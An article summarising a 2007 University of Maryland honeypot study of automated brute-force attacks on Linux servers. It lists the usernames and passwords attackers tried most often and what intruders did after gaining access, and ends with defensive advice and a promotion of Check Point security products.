Are hackers trying to get into your company’s computers right now? And what are they up to? A February 2007 study by the University of Maryland's A. James Clark School of Engineering is one of the first to quantify a list of the most unsecure usernames and passwords that administrators use on computers, giving attackers more chance of successfully accessing corporate information resources.
The study, conducted by Michel Cukier, Clark School assistant professor of mechanical engineering, profiled the behavior of brute force hackers, who use simple software-aided techniques to randomly attack large numbers of computers. The researchers discovered which usernames and passwords hackers tried most often and what they do when they gain access to a server.
On television and in film, these kinds of hackers have been portrayed as people with grudges who target specific institutions and manually try to break into their computers. But in reality, Cukier says, "Most of these attacks employ automated scripts that indiscriminately seek out thousands of computers at a time, looking for vulnerabilities."
Choose longer, more difficult, and less obvious passwords with upper and lowercase letters and numbers not open to brute-force attacks.
"Our data provide quantifiable evidence that attacks are happening all the time to computers with Internet connections," Cukier says. "The computers in our study were attacked, on average, 2,244 times a day."
Cukier and two of his graduate students, Daniel Ramsbrock and Robin Berthier, set up weak security on four Linux computers with Internet access, then recorded what happened as the individual machines were attacked. They discovered the vast majority of attacks came from relatively unsophisticated hackers using "dictionary scripts," a type of software that runs through lists of common usernames and passwords attempting to break into computers.
Ten most vulnerable usernames
"Root" was the top username guess by dictionary scripts—attempted 12
times more often than the second-place "admin." Successful root access
would open an entire computer to a hacker, while admin would grant
access to somewhat lesser administrative privileges. Other top
usernames in hacker scripts were "test," "guest," "info," "adm,"
"mysql," "user," "administrator," and "oracle." All should be avoided
as usernames, Cukier says.
Bad password policy
The researchers found the most common password-guessing ploy was to
reenter or try variations of the username. Some 43 percent of all
password-guessing attempts simply reentered the username. The username
followed by "123" was the second most-tried choice. Other common
passwords attempted included "123456," "password," "1234," "12345,"
"passwd," "123," "test," and "1." These findings support the warnings of security experts that a password should never be
identical or even related to its associated username, Cukier says.
What a hacker wants
Once
hackers gain access to computers, they swiftly act to determine whether
it could be of use to them. During the study, the hackers' most common
sequence of actions was to check the accessed computer's software
configuration, change the password, check the hardware and/or software
configuration again, download a file, install the downloaded program,
and then run it.
What are the hackers trying to accomplish? "The scripts return a list of most-likely-prospect computers to the hacker, who then attempts to access and compromise as many of them as possible," Cukier says. "Often they set up backdoors—undetected entrances into the computer that they control—so they can create botnets, for profit or disreputable purposes." A botnet is a collection of compromised computers that are controlled by autonomous software robots answering to a hacker who manipulates the computers remotely. Botnets can act to perpetrate fraud or identity theft, disrupt other networks, and damage computer files, among other things.
This study provides solid statistical evidence that supports widely held beliefs about username/password vulnerability and post-compromise attacking behavior. Computer administrators should avoid all of the usernames and passwords identified in the research and choose longer, more difficult and less obvious passwords with combinations of upper and lowercase letters and numbers that are not open to brute-force dictionary attacks.
In addition, the emerging profile of "script kiddy" hackers presented here can help security administrators in two main ways: in choosing security tools to combat the most common attacker actions and in performing more focused post-attack damage control and clean-up, according to Cukier.
Check Point approach
Among other security tools security administrators can evaluate in the
effort to combat brute force attacks is Check Point Eventia Analyzer,
which can prevent repeated brute force attacks by creating an "event"
after multiple, failed authorization attempts with the following steps:
username/password plus automated reaction to block the offending source
IP. Check Point also provides real-time security updates to its
security gateways for protection from brute force, buffer overflow, SQL
injection, and other malicious hacker attacks. These optional updates
come via SmartDefense Services,
which maintain the most current preemptive security for the Check Point
security infrastructure. To help you stay ahead of emerging threats and
attacks, SmartDefense Services provide real-time updates and
configuration advisories for defenses and security policies.
Note: A summary of the study and a list of the top 1,000 usernames tried by hackers' dictionary scripts is available from the authors.